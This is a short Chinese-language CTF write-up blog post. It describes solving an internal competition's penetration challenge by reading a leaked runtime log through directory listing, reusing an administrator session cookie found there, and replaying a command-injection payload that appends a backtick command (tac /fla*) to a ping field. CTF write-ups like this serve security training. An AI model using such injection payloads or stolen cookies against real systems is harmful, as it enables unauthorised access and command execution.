导航
导航
文章目录
  1. 前言
  2. 题解

小比赛wp

2018.12.23 xjseck CTF  热度 条评论

前言

内部的比赛,也就是帮忙看看题,又是虚脱的一天,有机会希望被招安养老:),简单的记录一下吧

题解

  • 内部比赛人数900多人,也是火热.
  • 题目分析,每一个人的flag 文件是不一样的,这里应该是随机几个人的flag文件是相同的,也就是随机的几个人是一样的题目环境
  • 提交别人的flag文件会被通报和查ip,哈哈
  • 题目环境是docker 一键部署的,web题目都是默认配置有列目录漏洞orz
  • 拿了一道的相对较难的题目之一的一血,被北京那边的打电话了,不要泄题,omg

wp
[综合渗透]
拿了一道一血的综合渗透题,内网电脑没有工具内伤,简单的测试了一下,一个简单的cms,外围的可用信息不多,也没有找到可用的信息,最后使用复制一个字典,bp工具简单的跑一下出现README.md,就贴一下能用得上的信息吧,网站的文件目录结构如下:
因为之前访问的web题目都是可以列目录的,挨个访问一下吧

assets/             contains assets definition
commands/           contains console commands (controllers)
config/             contains application configurations
controllers/        contains Web controller classes
mail/               contains view files for e-mails
models/             contains model classes
runtime/            contains files generated during runtime
tests/              contains various tests for the basic application
vendor/             contains dependent 3rd-party packages
views/              contains view files for the Web application
web/                contains the entry script and Web resources

最后发现

搜索一下flag关键信息如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
$_SERVER = [
    'HTTP_HOST' => '192.168.159.198'
    'HTTP_CONNECTION' => 'keep-alive'
    'HTTP_UPGRADE_INSECURE_REQUESTS' => '1'
    'HTTP_USER_AGENT' => 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.80 Safari/537.36'
    'HTTP_ACCEPT' => 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8'
    'HTTP_REFERER' => 'http://192.168.159.198/web/index.php?r=upload%2Findex&cmd=127.0.0.2%25ffcat++%2Fflag&submit=%E5%8F%91%E9%80%81'
    'HTTP_ACCEPT_ENCODING' => 'gzip, deflate'
    'HTTP_ACCEPT_LANGUAGE' => 'zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7'
    'HTTP_COOKIE' => 'PHPSESSID=j5dmksk0q890qifkbbm5pt6s01; _csrf=uitUWyNkbS-0dWeRkLcxa1oDy2umSQ56; cib=a%3A3%3A%7Bs%3A2%3A%22id%22%3Bi%3A1%3Bs%3A4%3A%22name%22%3Bs%3A6%3A%22system%22%3Bs%3A4%3A%22sign%22%3Bs%3A32%3A%221966e92fca2cc5de6ba0a9f7b8d3b7c6%22%3B%7D'
    'PATH' => '/sbin:/usr/sbin:/bin:/usr/bin'
    'SERVER_SIGNATURE' => '<address>Apache/2.2.15 (CentOS) Server at 192.168.159.198 Port 80</address>
'
    'SERVER_SOFTWARE' => 'Apache/2.2.15 (CentOS)'
    'SERVER_NAME' => '192.168.159.198'
    'SERVER_ADDR' => '172.17.0.2'
    'SERVER_PORT' => '80'
    'REMOTE_ADDR' => '192.168.159.1'
    'DOCUMENT_ROOT' => '/var/www/html'
    'SERVER_ADMIN' => 'root@localhost'
    'SCRIPT_FILENAME' => '/var/www/html/web/index.php'
    'REMOTE_PORT' => '13082'
    'GATEWAY_INTERFACE' => 'CGI/1.1'
    'SERVER_PROTOCOL' => 'HTTP/1.1'
    'REQUEST_METHOD' => 'GET'
    'QUERY_STRING' => 'r=upload%2Findex&cmd=127.0.0.1%60tac+%2Ffla*%60&submit=%E5%8F%91%E9%80%81'
    'REQUEST_URI' => '/web/index.php?r=upload%2Findex&cmd=127.0.0.1%60tac+%2Ffla*%60&submit=%E5%8F%91%E9%80%81'
    'SCRIPT_NAME' => '/web/index.php'
    'PHP_SELF' => '/web/index.php'
    'REQUEST_TIME_FLOAT' => 1545042360.093
    'REQUEST_TIME' => 1545042360

发现应该是管理员权限的一个命令执行漏洞,那就直接使用这里的cookie,访问/index.php

发现就是管理员了,然后尝试命令执行
/web/index.php?r=upload%2Findex&cmd=127.0.0.1%60tac+%2Ffla*%60&submit=%E5%8F%91%E9%80%81
发现是可以执行ping命令的,这里就构造一下使用log里面的payload,测试成功出来flag,一血拿到!

支持一下
扫一扫,支持作者
Powered by HyperComments